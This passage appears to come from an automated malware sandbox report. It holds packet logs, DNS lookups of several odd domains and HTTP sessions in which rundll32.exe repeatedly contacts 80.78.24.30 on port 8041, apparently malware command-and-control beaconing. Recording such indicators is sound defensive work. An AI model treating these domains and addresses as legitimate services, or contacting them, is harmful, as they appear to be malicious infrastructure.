                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.259819984 CEST44362395188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.259862900 CEST62395443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.259881973 CEST44362395188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.259932995 CEST62395443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.260091066 CEST62395443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.260106087 CEST44362395188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.442378998 CEST62396443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.442433119 CEST44362396188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.442506075 CEST62396443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.443007946 CEST62396443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.443030119 CEST44362396188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.685295105 CEST623978041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.690854073 CEST80416239780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.691467047 CEST623978041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.691746950 CEST623978041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.699409008 CEST80416239780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.928544998 CEST44362396188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.928618908 CEST62396443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.929054022 CEST62396443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.929070950 CEST44362396188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.930457115 CEST62396443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:05.930471897 CEST44362396188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.278456926 CEST44362396188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.278542042 CEST44362396188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.281951904 CEST62396443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.282038927 CEST62396443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.282063961 CEST44362396188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.335129023 CEST80416239780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.335453987 CEST80416239780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.340359926 CEST623978041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.340744972 CEST623978041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.341656923 CEST623988041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.345853090 CEST80416239780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.346561909 CEST80416239880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.349674940 CEST623988041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.353410959 CEST623988041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.358299971 CEST80416239880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.380966902 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.381062031 CEST44362399188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.383594990 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.386428118 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.386461020 CEST44362399188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.873123884 CEST44362399188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.873930931 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.875093937 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.875093937 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.875127077 CEST44362399188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:06.875174046 CEST44362399188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.002310038 CEST80416239880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.002387047 CEST623988041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.002549887 CEST80416239880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.002607107 CEST623988041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.002823114 CEST623988041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.003263950 CEST624008041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.007638931 CEST80416239880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.008181095 CEST80416240080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.008248091 CEST624008041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.008389950 CEST624008041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.013514996 CEST80416240080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.013573885 CEST624008041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.325375080 CEST44362399188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.325453043 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.325470924 CEST44362399188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.325552940 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.325843096 CEST62399443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.325870037 CEST44362399188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.526705027 CEST62401443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.526738882 CEST44362401188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.526793003 CEST62401443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.527221918 CEST62401443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.527230024 CEST44362401188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.996234894 CEST44362401188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.998918056 CEST62401443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.999279022 CEST62401443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:07.999286890 CEST44362401188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:08.011728048 CEST62401443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:08.011734009 CEST44362401188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:08.426604033 CEST44362401188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:14.590337992 CEST44362409188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:14.707403898 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:14.707436085 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:14.707556963 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:14.708138943 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:14.708149910 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.182930946 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.183000088 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.183602095 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.183607101 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.185144901 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.185148954 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.632982016 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.633059978 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.633074999 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.633090973 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.633153915 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.633153915 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.641541004 CEST62410443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.641552925 CEST44362410188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.787427902 CEST624118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.793271065 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.793343067 CEST624118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.793771982 CEST624118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.797435045 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.797528982 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.797594070 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.797863960 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.797898054 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:15.798579931 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.266311884 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.271502018 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.272114992 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.272129059 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.311940908 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.311958075 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.427480936 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.427530050 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.427988052 CEST624118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.428704023 CEST624118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.428832054 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.433460951 CEST80416241180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.433804989 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.435542107 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.435870886 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.440681934 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.758096933 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.758188009 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.758352995 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.762128115 CEST62412443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.762159109 CEST44362412188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.855417967 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.855465889 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.858257055 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.863411903 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:16.863431931 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074749947 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074805021 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074839115 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.074929953 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.075265884 CEST624138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.075784922 CEST624158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.080091953 CEST80416241380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.080925941 CEST80416241580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.080986023 CEST624158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.081101894 CEST624158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.087163925 CEST80416241580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.087923050 CEST80416241580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.087971926 CEST624158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.326440096 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.326541901 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.328082085 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.328109980 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.329442024 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.329453945 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.767904043 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.767970085 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768033981 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768073082 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768081903 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768122911 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768260002 CEST62414443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.768295050 CEST44362414188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863226891 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863262892 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863362074 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863589048 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:17.863603115 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.331527948 CEST44362416188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.334866047 CEST62416443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:48:18.335256100 CEST62416443192.168.2.7188.114.97.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 20:44:22.852566957 CEST | 192.168.2.7 | 1.1.1.1 | 0x77cd | Standard query (0) | tiguanin.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:36.778333902 CEST | 192.168.2.7 | 1.1.1.1 | 0x5fe8 | Standard query (0) | bazarunet.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:57.709093094 CEST | 192.168.2.7 | 1.1.1.1 | 0xe18b | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:58.707938910 CEST | 192.168.2.7 | 1.1.1.1 | 0xe18b | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:46:18.158830881 CEST | 192.168.2.7 | 1.1.1.1 | 0x8e6 | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:46:23.120454073 CEST | 192.168.2.7 | 1.1.1.1 | 0xc6e3 | Standard query (0) | isomicrotich.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:48:27.010699034 CEST | 192.168.2.7 | 1.1.1.1 | 0x52e9 | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 20:44:23.011220932 CEST | 1.1.1.1 | 192.168.2.7 | 0x77cd | No error (0) | tiguanin.com | | 80.78.24.30 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:36.828243971 CEST | 1.1.1.1 | 192.168.2.7 | 0x5fe8 | No error (0) | bazarunet.com | | 80.78.24.30 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:58.847457886 CEST | 1.1.1.1 | 192.168.2.7 | 0xe18b | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:58.847788095 CEST | 1.1.1.1 | 192.168.2.7 | 0xe18b | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:46:18.326425076 CEST | 1.1.1.1 | 192.168.2.7 | 0x8e6 | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:46:23.157037973 CEST | 1.1.1.1 | 192.168.2.7 | 0xc6e3 | No error (0) | isomicrotich.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:46:23.157037973 CEST | 1.1.1.1 | 192.168.2.7 | 0xc6e3 | No error (0) | isomicrotich.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:48:27.162569046 CEST | 1.1.1.1 | 192.168.2.7 | 0x52e9 | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                • isomicrotich.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:44:23.648807049 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.74970280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:24.416102886 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.74970480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:28.113327026 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.74970580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:28.760137081 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.74971080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:34.655071020 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.74971280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:35.671681881 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                6192.168.2.74971580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:37.563316107 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                7192.168.2.76379080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:38.232124090 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                8192.168.2.76379280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:43.137300014 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.76379380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:43.961194992 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                10192.168.2.76379580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:46.663008928 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                11192.168.2.76379680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:47.467716932 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                12192.168.2.75745280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:53.144684076 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
